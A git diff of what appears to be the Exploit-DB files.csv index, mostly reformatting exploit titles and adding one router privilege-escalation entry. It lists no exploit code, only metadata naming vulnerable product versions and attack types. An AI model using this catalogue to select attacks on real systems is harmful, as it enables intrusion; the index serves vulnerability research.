diff --git a/files.csv b/files.csv index f1bbd2cea..02034108b 100644 --- a/files.csv +++ b/files.csv @@ -3674,7 +3674,7 @@ id,file,description,date,author,platform,type,port 28855,platforms/windows/dos/28855.txt,"ALLPlayer 5.6.2 - '.m3u' Local Buffer Overflow (PoC)",2013-10-10,metacom,windows,dos,0 28860,platforms/windows/dos/28860.c,"FtpXQ Server 3.01 - MKD Command Remote Overflow Denial of Service",2006-10-24,"Federico Fazzi",windows,dos,0 40374,platforms/windows/dos/40374.html,"Microsoft Internet Explorer 11.0.9600.18482 - Use After Free",2016-09-13,"Marcin Ressel",windows,dos,0 -28880,platforms/windows/dos/28880.txt,"Microsoft Internet Explorer 6.0/7.0 - RemoveChild Denial of Service",2006-10-30,"Wojciech H",windows,dos,0 +28880,platforms/windows/dos/28880.txt,"Microsoft Internet Explorer 6.0/7.0 - 'RemoveChild' Denial of Service",2006-10-30,"Wojciech H",windows,dos,0 28894,platforms/windows/dos/28894.txt,"Outpost Firewall PRO 4.0 - Local Denial of Service",2006-11-01,"Matousec Transparent security",windows,dos,0 28895,platforms/linux/dos/28895.txt,"Linux Kernel 2.6.x - SquashFS Double-Free Denial of Service",2006-11-02,LMH,linux,dos,0 28897,platforms/windows/dos/28897.txt,"Microsoft Internet Explorer 7 - MHTML Denial of Service",2006-11-02,"Positive Technologies",windows,dos,0 @@ -7448,7 +7448,7 @@ id,file,description,date,author,platform,type,port 19353,platforms/irix/local/19353.txt,"SGI IRIX 6.4 suid_exec - Exploit",1996-12-02,"Yuri Volobuev",irix,local,0 19354,platforms/aix/local/19354.txt,"SGI IRIX 5.1/5.2 sgihelp - Exploit",1996-12-02,anonymous,aix,local,0 19355,platforms/irix/local/19355.txt,"SGI IRIX 6.4 startmidi - Exploit",1997-02-09,"David Hedley",irix,local,0 -19356,platforms/irix/local/19356.txt,"SGI IRIX 6.3 Systour and OutOfBox - Exploit",1996-10-30,"Tun-Hui Hu",irix,local,0 +19356,platforms/irix/local/19356.txt,"SGI IRIX 6.3 - 'Systour' / 'OutOfBox' Exploit",1996-10-30,"Tun-Hui Hu",irix,local,0 19358,platforms/irix/local/19358.txt,"SGI IRIX 6.4 xfsdump - Exploit",1997-05-07,"Yuri Volobuev",irix,local,0 19359,platforms/windows/local/19359.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4 / NT 3.5.1/SP1/SP2/SP3/SP4/SP5 - Screensaver",1999-03-10,"Cybermedia Software Private Limited",windows,local,0 19360,platforms/linux/local/19360.c,"Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - 'vsyslog()' Buffer Overflow",1997-12-21,"Solar Designer",linux,local,0 @@ -9121,7 +9121,7 @@ id,file,description,date,author,platform,type,port 40943,platforms/linux/local/40943.txt,"Google Chrome + Fedora 25 / Ubuntu 16.04 - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",linux,local,0 40950,platforms/aix/local/40950.sh,"IBM AIX 6.1/7.1/7.2 - 'Bellmail' Privilege Escalation",2016-12-22,"Hector X. Monsegur",aix,local,0 40953,platforms/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Privilege Escalation",2016-12-22,"Luka Pusic",linux,local,0 -40956,platforms/macos/local/40956.c,"Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0 +40956,platforms/macos/local/40956.c,"Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0 40957,platforms/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",macos,local,0 40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0 40967,platforms/windows/local/40967.txt,"Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation",2016-12-26,"Heliand Dema",windows,local,0 @@ -9841,7 +9841,7 @@ id,file,description,date,author,platform,type,port 2657,platforms/windows/remote/2657.html,"Microsoft Internet Explorer 7 - Popup Address Bar Spoofing",2006-10-26,anonymous,windows,remote,0 2671,platforms/windows/remote/2671.pl,"Novell eDirectory 8.8 - NDS Server Remote Stack Overflow",2006-10-28,FistFuXXer,windows,remote,8028 2680,platforms/win_x86/remote/2680.pm,"PrivateWire Gateway 3.7 (Windows x86) - Remote Buffer Overflow (Metasploit)",2006-10-29,"Michael Thumann",win_x86,remote,80 -2689,platforms/windows/remote/2689.c,"Novell eDirectory 9.0 - DHost Remote Buffer Overflow",2006-10-30,Expanders,windows,remote,0 +2689,platforms/windows/remote/2689.c,"Novell eDirectory 9.0 - 'DHost' Remote Buffer Overflow",2006-10-30,Expanders,windows,remote,0 2690,platforms/windows/remote/2690.c,"Easy File Sharing Web Server 4 - Remote Information Stealer Exploit",2006-10-30,"Greg Linares",windows,remote,80 2699,platforms/windows/remote/2699.c,"EFS Easy Address Book Web Server 1.2 - Remote File Stream Exploit",2006-11-01,"Greg Linares",windows,remote,0 2729,platforms/windows/remote/2729.pm,"Omni-NFS Server 5.2 - 'nfsd.exe' Remote Stack Overflow (Metasploit)",2006-11-06,"Evgeny Legerov",windows,remote,2049 @@ -10303,7 +10303,7 @@ id,file,description,date,author,platform,type,port 6130,platforms/multiple/remote/6130.c,"BIND 9.x - Remote DNS Cache Poisoning Exploit",2008-07-25,"Marc Bevand",multiple,remote,0 6151,platforms/windows/remote/6151.txt,"Velocity Web-Server 1.0 - Directory Traversal",2008-07-28,DSecRG,windows,remote,0 6152,platforms/windows/remote/6152.html,"Trend Micro OfficeScan - ObjRemoveCtrl ActiveX Control Buffer Overflow",2008-07-28,Elazar,windows,remote,0 -6155,platforms/hardware/remote/6155.c,"Cisco IOS 12.3(18) (FTP Server) - Remote Exploit (Attached to GDB)",2008-07-29,"Andy Davis",hardware,remote,0 +6155,platforms/hardware/remote/6155.c,"Cisco IOS 12.3(18) (FTP Server) - Remote Exploit (Attached to GDB)",2008-07-29,"Andy Davis",hardware,remote,0 6175,platforms/windows/remote/6175.html,"NCTsoft - 'AudFile.dll' ActiveX Control Remote Buffer Overflow",2008-07-31,shinnai,windows,remote,0 6195,platforms/windows/remote/6195.c,"IntelliTamper 2.07 - 'imgsrc' Remote Buffer Overflow",2008-08-03,r0ut3r,windows,remote,0 6217,platforms/windows/remote/6217.pl,"BlazeDVD 5.0 - PLF Playlist File Remote Buffer Overflow",2008-08-10,LiquidWorm,windows,remote,0 @@ -10365,7 +10365,7 @@ id,file,description,date,author,platform,type,port 6873,platforms/windows/remote/6873.html,"MW6 PDF417 - ActiveX 'MW6PDF417.dll' Remote Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 6875,platforms/windows/remote/6875.html,"Visagesoft eXPert PDF ViewerX - 'VSPDFViewerX.ocx' File Overwrite",2008-10-29,"Marco Torti",windows,remote,0 6878,platforms/windows/remote/6878.html,"DjVu - ActiveX Control 3.0 ImageURL Property Overflow",2008-10-30,"Shahriyar Jalayeri",windows,remote,0 -6880,platforms/windows/remote/6880.html,"Opera 9.61 - opera:historysearch Code Execution (PoC)",2008-10-30,"Aviv Raff",windows,remote,0 +6880,platforms/windows/remote/6880.html,"Opera 9.61 - 'opera:historysearch' Code Execution (PoC)",2008-10-30,"Aviv Raff",windows,remote,0 6899,platforms/hardware/remote/6899.txt,"A-Link WL54AP3 / WL54AP2 - Cross-Site Request Forgery / Cross-Site Scripting",2008-10-31,"Henri Lindberg",hardware,remote,0 6921,platforms/windows/remote/6921.rb,"GE Fanuc Real Time Information Portal 2.6 - 'writeFile()' API Exploit (Metasploit)",2008-11-01,"Kevin Finisterre",windows,remote,0 6963,platforms/windows/remote/6963.html,"Chilkat Crypt - ActiveX Arbitrary File Creation/Execution (PoC)",2008-11-03,shinnai,windows,remote,0 @@ -10942,7 +10942,7 @@ id,file,description,date,author,platform,type,port 15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 - 'soap_action_name' POST UPnP 'sscanf' Buffer Overflow",2010-10-28,n00b,windows,remote,0 15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Authenticated Directory Traversal",2010-10-29,chr1x,windows,remote,0 15352,platforms/windows/remote/15352.html,"Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Exploit",2010-10-29,Unknown,windows,remote,0 -15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Directory Traversal",2010-10-30,"Yakir Wizman",windows,remote,0 +15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 - 'RETR'/'DELE'/'RMD' Directory Traversal",2010-10-30,"Yakir Wizman",windows,remote,0 15358,platforms/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0 15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0 15371,platforms/windows/remote/15371.txt,"Yaws 1.89 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0 @@ -12305,7 +12305,7 @@ id,file,description,date,author,platform,type,port 20355,platforms/windows/remote/20355.rb,"Plixer Scrutinizer NetFlow and sFlow Analyzer 9 - Default MySQL Credential (Metasploit)",2012-08-08,Metasploit,windows,remote,0 20369,platforms/hardware/remote/20369.sh,"Cisco PIX Firewall 5.2 - PASV Mode FTP Internal Address Disclosure",2000-10-03,"Fabio Pietrosanti",hardware,remote,0 20370,platforms/cgi/remote/20370.txt,"Kootenay Web Inc whois 1.0 - Remote Command Execution",2000-10-29,"Mark Stratman",cgi,remote,0 -20371,platforms/windows/remote/20371.txt,"Microsoft Windows 95/WfW - smbclient Directory Traversal",1995-10-30,"Dan Shearer",windows,remote,0 +20371,platforms/windows/remote/20371.txt,"Microsoft Windows 95/Windows for Workgroups - 'smbclient' Directory Traversal",1995-10-30,"Dan Shearer",windows,remote,0 20372,platforms/hardware/remote/20372.pl,"Cisco Virtual Central Office 4000 (VCO/4K) 5.1.3 - Remote Username / Password Retrieval",2000-10-26,@stake,hardware,remote,0 20374,platforms/unix/remote/20374.c,"ISC BIND 8.1 - Host Remote Buffer Overflow",2000-10-27,antirez,unix,remote,0 20375,platforms/windows/remote/20375.txt,"Sun Java Web Server 1.1 Beta - Viewable .jhtml Source",1997-07-16,"Brian Krahmer",windows,remote,0 @@ -14470,7 +14470,7 @@ id,file,description,date,author,platform,type,port 31395,platforms/windows/remote/31395.txt,"Cisco User-Changeable Password (UCP) 3.3.4.12.5 - 'CSUserCGI.exe' Help Facility Cross-Site Scripting",2008-03-12,felix,windows,remote,0 31396,platforms/linux/remote/31396.txt,"Lighttpd 1.4.x - mod_userdir Information Disclosure",2008-03-12,julien.cayzac,linux,remote,0 31698,platforms/hardware/remote/31698.txt,"F5 Networks FirePass 4100 SSL VPN - 'installControl.php3' Cross-Site Scripting",2008-04-23,"Alberto Cuesta Partida",hardware,remote,0 -31699,platforms/windows/remote/31699.txt,"RSA Authentication Agent for Web 5.3 - Open Redirection",2008-04-23,"Richard Brain",windows,remote,0 +31699,platforms/windows/remote/31699.txt,"RSA Authentication Agent for Web 5.3 - Open Redirection",2008-04-23,"Richard Brain",windows,remote,0 31405,platforms/windows/remote/31405.c,"XnView 1.92.1 - Command-Line Arguments Buffer Overflow",2014-02-05,"Sylvain THUAL",windows,remote,0 31407,platforms/windows/remote/31407.txt,"MG-SOFT Net Inspector 6.5.0.826 - Multiple Remote Vulnerabilities",2008-03-17,"Luigi Auriemma",windows,remote,0 31409,platforms/windows/remote/31409.txt,"BootManage TFTP Server 1.99 - 'Filename' Remote Buffer Overflow",2008-03-17,"Luigi Auriemma",windows,remote,0 @@ -14608,7 +14608,7 @@ id,file,description,date,author,platform,type,port 32470,platforms/linux/remote/32470.rb,"CUPS 1.3.7 - 'HP-GL/2' Filter Remote Code Execution",2008-10-09,regenrecht,linux,remote,0 32475,platforms/multiple/remote/32475.sql,"Oracle Database Server 11.1 - 'CREATE ANY Directory' Privilege Escalation",2008-10-13,"Paul M. Wright",multiple,remote,0 32564,platforms/multiple/remote/32564.txt,"XWork < 2.0.11.2 - 'ParameterInterceptor' Class OGNL Security Bypass",2008-11-04,"Meder Kydyraliev",multiple,remote,0 -32489,platforms/windows/remote/32489.txt,"Microsoft Outlook Web Access for Exchange Server 2003 - 'redir.asp' Open Redirection",2008-10-15,"Martin Suess",windows,remote,0 +32489,platforms/windows/remote/32489.txt,"Microsoft Outlook Web Access for Exchange Server 2003 - 'redir.asp' Open Redirection",2008-10-15,"Martin Suess",windows,remote,0 32491,platforms/windows/remote/32491.html,"Hummingbird HostExplorer 6.2/8.0 - ActiveX Control 'PlainTextPassword()' Buffer Overflow",2008-10-16,"Thomas Pollet",windows,remote,0 32493,platforms/windows/remote/32493.html,"Hummingbird Deployment Wizard 10 - 'DeployRun.dll' ActiveX Control Multiple Security Vulnerabilities",2008-10-17,shinnai,windows,remote,0 32515,platforms/linux/remote/32515.rb,"Katello (RedHat Satellite) - users/update_roles Missing Authorisation (Metasploit)",2014-03-26,Metasploit,linux,remote,443 @@ -14875,7 +14875,7 @@ id,file,description,date,author,platform,type,port 33865,platforms/linux/remote/33865.rb,"Alienvault Open Source SIEM (OSSIM) - av-centerd Command Injection (Metasploit)",2014-06-24,Metasploit,linux,remote,40007 33869,platforms/hardware/remote/33869.txt,"Huawei EchoLife HG520 3.10.18.5-1.0.5.0 - Remote Information Disclosure",2010-04-22,hkm,hardware,remote,0 33871,platforms/multiple/remote/33871.txt,"Tiny Java Web Server 1.71 - Multiple Input Validation Vulnerabilities",2010-04-08,cp77fk4r,multiple,remote,0 -33873,platforms/multiple/remote/33873.txt,"HP System Management Homepage - 'RedirectUrl' Open Redirection",2010-04-25,"Aung Khant",multiple,remote,0 +33873,platforms/multiple/remote/33873.txt,"HP System Management Homepage - 'RedirectUrl' Open Redirection",2010-04-25,"Aung Khant",multiple,remote,0 33877,platforms/multiple/remote/33877.c,"NovaSTOR NovaNET 12.0 - Remote Command Execution",2007-09-25,mu-b,multiple,remote,0 33878,platforms/multiple/remote/33878.c,"NovaSTOR NovaNET 12.0 - Remote SYSTEM Exploit",2007-09-25,mu-b,multiple,remote,0 33890,platforms/windows/remote/33890.txt,"OneHTTPD 0.6 - Directory Traversal",2010-04-27,"John Leitch",windows,remote,0 @@ -15392,7 +15392,7 @@ id,file,description,date,author,platform,type,port 37900,platforms/multiple/remote/37900.txt,"IBM Lotus Notes Traveler 8.5.1.x - Multiple Input Validation Vulnerabilities",2012-09-28,MustLive,multiple,remote,0 37952,platforms/windows/remote/37952.py,"Easy Address Book Web Server 1.6 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote,0 37958,platforms/multiple/remote/37958.rb,"Mozilla Firefox - 'pdf.js' Privileged JavaScript Injection (Metasploit)",2015-08-24,Metasploit,multiple,remote,0 -37969,platforms/hardware/remote/37969.txt,"FirePass 7.0 SSL VPN - 'refreshURL' Open Redirection",2012-10-21,"Aung Khant",hardware,remote,0 +37969,platforms/hardware/remote/37969.txt,"FirePass 7.0 SSL VPN - 'refreshURL' Open Redirection",2012-10-21,"Aung Khant",hardware,remote,0 37985,platforms/windows/remote/37985.py,"FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution",2015-08-27,"Naser Farhadi",windows,remote,80 37996,platforms/windows/remote/37996.txt,"Axigen Mail Server - 'Filename' Directory Traversal",2012-10-31,"Zhao Liang",windows,remote,0 38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - 'GET' Buffer Overflow",2015-08-29,Koby,windows,remote,21 @@ -15659,7 +15659,7 @@ id,file,description,date,author,platform,type,port 40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 < 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0 40232,platforms/linux/remote/40232.py,"FreePBX 13/14 - Remote Command Execution / Privilege Escalation",2016-08-12,pgt,linux,remote,0 40280,platforms/windows/remote/40280.py,"Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)",2016-02-26,ohnozzy,windows,remote,0 -40234,platforms/windows/remote/40234.py,"EasyFTP Server 1.7.0.11 - 'APPE' Remote Buffer Overflow",2012-03-03,Swappage,windows,remote,0 +40234,platforms/windows/remote/40234.py,"EasyFTP Server 1.7.0.11 - 'APPE' Remote Buffer Overflow",2012-03-03,Swappage,windows,remote,0 40279,platforms/windows/remote/40279.py,"Microsoft Windows - 'NetAPI32.dll' Code Execution (Python) (MS08-067)",2016-02-26,ohnozzy,windows,remote,0 40235,platforms/hardware/remote/40235.py,"Samsung Smart Home Camera SNH-P-6410 - Command Injection",2016-08-14,PentestPartners,hardware,remote,0 40258,platforms/hardware/remote/40258.txt,"Cisco ASA 8.x - 'EXTRABACON' Authentication Bypass",2016-08-18,"Shadow Brokers",hardware,remote,161 @@ -15930,6 +15930,7 @@ id,file,description,date,author,platform,type,port 43032,platforms/unix/remote/43032.rb,"Polycom - Command Shell Authorization Bypass (Metasploit)",2017-10-23,Metasploit,unix,remote,0 43055,platforms/hardware/remote/43055.rb,"Netgear DGN1000 1.1.00.48 - 'Setup.cgi' Unauthenticated Remote Code Execution (Metasploit)",2017-10-25,Metasploit,hardware,remote,0 43059,platforms/windows/remote/43059.py,"DameWare Remote Controller < 12.0.0.520 - Remote Code Execution",2016-04-03,Securifera,windows,remote,0 +43061,platforms/hardware/remote/43061.txt,"MitraStar DSL-100HN-T1/GPT-2541GNAC - Privilege Escalation",2017-10-28,j0lama,hardware,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -20548,7 +20549,7 @@ id,file,description,date,author,platform,type,port 6874,platforms/php/webapps/6874.txt,"Harlandscripts Pro Traffic One - 'mypage.php' SQL Injection",2008-10-29,"Beenu Arora",php,webapps,0 6876,platforms/php/webapps/6876.txt,"Venalsur on-line Booking Centre - Cross-Site Scripting / SQL Injection",2008-10-29,d3b4g,php,webapps,0 6877,platforms/php/webapps/6877.txt,"Pro Traffic One - 'poll_results.php' SQL Injection",2008-10-29,"Hussin X",php,webapps,0 -6879,platforms/php/webapps/6879.txt,"MyPHP Forum 3.0 - Edit Topics/Blind SQL Injection",2008-10-30,StAkeR,php,webapps,0 +6879,platforms/php/webapps/6879.txt,"MyPHP Forum 3.0 - Edit Topics / Blind SQL Injection",2008-10-30,StAkeR,php,webapps,0 6881,platforms/php/webapps/6881.txt,"Absolute File Send 1.0 - Remote Insecure Cookie Handling",2008-10-30,Hakxer,php,webapps,0 6882,platforms/php/webapps/6882.txt,"Absolute Podcast 1.0 - Remote Insecure Cookie Handling",2008-10-30,Hakxer,php,webapps,0 6883,platforms/php/webapps/6883.txt,"Absolute Poll Manager XE 4.1 - Insecure Cookie Handling",2008-10-30,Hakxer,php,webapps,0 @@ -22082,7 +22083,7 @@ id,file,description,date,author,platform,type,port 9144,platforms/php/webapps/9144.txt,"Mobilelib Gold 3.0 - Local File Disclosure",2009-07-14,Qabandi,php,webapps,0 9145,platforms/php/webapps/9145.php,"Traidnt UP 2.0 - Blind SQL Injection",2009-07-14,Qabandi,php,webapps,0 9150,platforms/php/webapps/9150.txt,"WordPress Plugin My Category Order 2.8 - SQL Injection",2009-07-15,"Manh Luat",php,webapps,0 -9151,platforms/php/webapps/9151.txt,"ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition/Information Disclosure Vulnerabilities",2009-07-15,YEnH4ckEr,php,webapps,0 +9151,platforms/php/webapps/9151.txt,"ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition/Information Disclosure Vulnerabilities",2009-07-15,YEnH4ckEr,php,webapps,0 9153,platforms/php/webapps/9153.txt,"Admin News Tools 2.5 - 'fichier' Remote File Disclosure",2009-07-15,Securitylab.ir,php,webapps,0 9154,platforms/php/webapps/9154.js,"ZenPhoto 1.2.5 - Completely Blind SQL Injection",2009-07-15,petros,php,webapps,0 9155,platforms/php/webapps/9155.txt,"PHPGenealogy 2.0 - 'DataDirectory' Remote File Inclusion",2009-07-15,"Khashayar Fereidani",php,webapps,0 @@ -28181,7 +28182,7 @@ id,file,description,date,author,platform,type,port 25286,platforms/php/webapps/25286.txt,"MagicScripts E-Store Kit-2 PayPal Edition - Remote File Inclusion",2005-03-26,Dcrab,php,webapps,0 25292,platforms/hardware/webapps/25292.txt,"Cisco Linksys E4200 - Multiple Vulnerabilities",2013-05-07,sqlhacker,hardware,webapps,0 25298,platforms/php/webapps/25298.txt,"b2evolution 4.1.6 - Multiple Vulnerabilities",2013-05-07,"High-Tech Bridge SA",php,webapps,80 -25299,platforms/php/webapps/25299.txt,"Tkai's Shoutbox - 'Query' Open Redirection",2005-03-28,CorryL,php,webapps,0 +25299,platforms/php/webapps/25299.txt,"Tkai's Shoutbox - 'Query' Open Redirection",2005-03-28,CorryL,php,webapps,0 25300,platforms/php/webapps/25300.txt,"EXoops - Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps,0 25301,platforms/php/webapps/25301.txt,"Valdersoft Shopping Cart 3.0 - Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps,0 25302,platforms/php/webapps/25302.txt,"PHPCOIN 1.2 - 'auxpage.php?page' Traversal Arbitrary File Access",2005-03-29,"James Bercegay",php,webapps,0 @@ -29072,7 +29073,7 @@ id,file,description,date,author,platform,type,port 26485,platforms/php/webapps/26485.txt,"PHPList Mailing List Manager 2.x - '/admin/users.php?find' Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 26486,platforms/php/webapps/26486.txt,"SAP Web Application Server 6.x/7.0 - Error Page Cross-Site Scripting",2005-11-09,"Leandro Meiners",php,webapps,0 26487,platforms/php/webapps/26487.txt,"SAP Web Application Server 6.x/7.0 - 'frameset.htm?sap-syscmd' Cross-Site Scripting",2005-11-09,"Leandro Meiners",php,webapps,0 -26488,platforms/php/webapps/26488.txt,"SAP Web Application Server 6.x/7.0 - Open Redirection",2005-11-09,"Leandro Meiners",php,webapps,0 +26488,platforms/php/webapps/26488.txt,"SAP Web Application Server 6.x/7.0 - Open Redirection",2005-11-09,"Leandro Meiners",php,webapps,0 26490,platforms/php/webapps/26490.txt,"TikiWiki 1.9 - 'Tiki-view_forum_thread.php' Cross-Site Scripting",2005-11-09,"Moritz Naumann",php,webapps,0 26496,platforms/hardware/webapps/26496.txt,"eFile Wifi Transfer Manager 1.0 - Multiple Vulnerabilities",2013-06-30,Vulnerability-Lab,hardware,webapps,8080 26499,platforms/php/webapps/26499.txt,"PHPSysInfo 2.x - Multiple Input Validation Vulnerabilities",2005-11-11,anonymous,php,webapps,0 @@ -33193,7 +33194,7 @@ id,file,description,date,author,platform,type,port 32511,platforms/php/webapps/32511.txt,"qEngine CMS 6.0.0 - Multiple Vulnerabilities",2014-03-25,LiquidWorm,php,webapps,80 32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 - 'xhr.php?i' SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80 32521,platforms/php/webapps/32521.txt,"Osprey 1.0a4.1 - 'ListRecords.php' Multiple Remote File Inclusions",2008-10-23,BoZKuRTSeRDaR,php,webapps,0 -32523,platforms/php/webapps/32523.txt,"UC Gateway Investment SiteEngine 5.0 - 'api.php' Open Redirection",2008-10-23,xuanmumu,php,webapps,0 +32523,platforms/php/webapps/32523.txt,"UC Gateway Investment SiteEngine 5.0 - 'api.php' Open Redirection",2008-10-23,xuanmumu,php,webapps,0 32524,platforms/php/webapps/32524.txt,"UC Gateway Investment SiteEngine 5.0 - 'announcements.php' SQL Injection",2008-10-23,xuanmumu,php,webapps,0 32525,platforms/php/webapps/32525.txt,"Jetbox CMS 2.1 - 'liste' Cross-Site Scripting",2008-10-23,"Omer Singer",php,webapps,0 32526,platforms/php/webapps/32526.txt,"ClipShare Pro 4.0 - 'fullscreen.php' Cross-Site Scripting",2008-10-23,ShockShadow,php,webapps,0 @@ -33353,7 +33354,7 @@ id,file,description,date,author,platform,type,port 32759,platforms/php/webapps/32759.txt,"OpenX 2.6.2 - 'MAX_type' Local File Inclusion",2009-01-26,"Sarid Harper",php,webapps,0 32760,platforms/php/webapps/32760.txt,"NewsCMSLite - Insecure Cookie Authentication Bypass",2009-01-24,FarhadKey,php,webapps,0 32765,platforms/multiple/webapps/32765.txt,"csUpload Script Site - Authentication Bypass",2014-04-09,Satanic2000,multiple,webapps,0 -32766,platforms/php/webapps/32766.txt,"Autonomy Ultraseek - 'cs.html' Open Redirection",2009-01-28,buzzy,php,webapps,0 +32766,platforms/php/webapps/32766.txt,"Autonomy Ultraseek - 'cs.html' Open Redirection",2009-01-28,buzzy,php,webapps,0 32767,platforms/php/webapps/32767.txt,"Quick.CMS 5.4 - Multiple Vulnerabilities",2014-04-09,"Shpend Kurtishaj",php,webapps,0 32768,platforms/cgi/webapps/32768.pl,"PerlSoft Gästebuch 1.7b - 'admincenter.cgi' Remote Command Execution",2009-01-29,Perforin,cgi,webapps,0 32770,platforms/php/webapps/32770.txt,"E-PHP B2B Trading Marketplace Script - Cross-Site Scripting Multiple Vulnerabilities",2009-01-30,SaiedHacker,php,webapps,0 @@ -33524,7 +33525,7 @@ id,file,description,date,author,platform,type,port 33119,platforms/php/webapps/33119.txt,"Pilot Group eTraining - 'courses_login.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 33120,platforms/php/webapps/33120.txt,"Pilot Group eTraining - 'news_read.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 33121,platforms/php/webapps/33121.txt,"Pilot Group eTraining - 'lessons_login.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0 -33122,platforms/php/webapps/33122.txt,"Joomla! Component com_user - 'view' Open Redirection",2009-06-27,"599eme Man",php,webapps,0 +33122,platforms/php/webapps/33122.txt,"Joomla! Component com_user - 'view' Open Redirection",2009-06-27,"599eme Man",php,webapps,0 33125,platforms/php/webapps/33125.txt,"Joomla! Component Permis 1.0 (com_groups) - 'id' SQL Injection",2009-06-28,Prince_Pwn3r,php,webapps,0 33126,platforms/php/webapps/33126.txt,"Matterdaddy Market 1.x - 'index.php' Cross-Site Scripting",2009-06-28,Moudi,php,webapps,0 33127,platforms/php/webapps/33127.txt,"Miniweb 2.0 Site Builder Module - Cross-Site Scripting Multiple Vulnerabilities",2009-06-29,Moudi,php,webapps,0 @@ -35162,7 +35163,7 @@ id,file,description,date,author,platform,type,port 36313,platforms/php/webapps/36313.txt,"webERP 4.3.8 - Multiple Script URI Cross-Site Scripting Vulnerabilities",2011-11-17,"High-Tech Bridge SA",php,webapps,0 35982,platforms/windows/webapps/35982.txt,"Hewlett-Packard (HP) UCMDB - JMX-Console Authentication Bypass",2015-02-03,"Hans-Martin Muench",windows,webapps,8080 35988,platforms/php/webapps/35988.txt,"Support Incident Tracker (SiT!) 3.63 p1 - 'tasks.php?selected[]' SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 -35989,platforms/php/webapps/35989.txt,"MBoard 1.3 - 'url' Open Redirection",2011-07-27,"High-Tech Bridge SA",php,webapps,0 +35989,platforms/php/webapps/35989.txt,"MBoard 1.3 - 'url' Open Redirection",2011-07-27,"High-Tech Bridge SA",php,webapps,0 35990,platforms/php/webapps/35990.txt,"PHPJunkYard GBook 1.6/1.7 - Cross-Site Scripting Multiple Vulnerabilities",2011-07-27,"High-Tech Bridge SA",php,webapps,0 35991,platforms/php/webapps/35991.txt,"Pragyan CMS 3.0 - SQL Injection",2015-02-04,"Steffen Rösemann",php,webapps,80 35914,platforms/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen Rösemann",php,webapps,80 @@ -35207,7 +35208,7 @@ id,file,description,date,author,platform,type,port 35979,platforms/php/webapps/35979.txt,"Willscript Recipes Website Script Silver Edition - 'viewRecipe.php' SQL Injection",2011-07-25,Lazmania61,php,webapps,0 36040,platforms/php/webapps/36040.txt,"Chamilo LMS 1.9.8 - Blind SQL Injection",2015-02-09,"Kacper Szurek",php,webapps,80 36000,platforms/php/webapps/36000.txt,"HP Network Automation 9.10 - SQL Injection",2011-07-28,anonymous,php,webapps,0 -36001,platforms/asp/webapps/36001.txt,"Sitecore CMS 6.4.1 - 'url' Open Redirection",2011-07-28,"Tom Neaves",asp,webapps,0 +36001,platforms/asp/webapps/36001.txt,"Sitecore CMS 6.4.1 - 'url' Open Redirection",2011-07-28,"Tom Neaves",asp,webapps,0 36002,platforms/jsp/webapps/36002.txt,"IBM Tivoli Service Automation Manager 7.2.4 - Remote Code Execution",2014-12-12,"Jakub Palaczynski",jsp,webapps,0 36003,platforms/php/webapps/36003.txt,"Curverider Elgg 1.7.9 - Cross-Site Scripting Multiple Vulnerabilities",2011-08-01,"Aung Khant",php,webapps,0 36005,platforms/php/webapps/36005.txt,"MyBB MyTabs Plugin - 'tab' SQL Injection",2011-08-02,"AutoRUN & 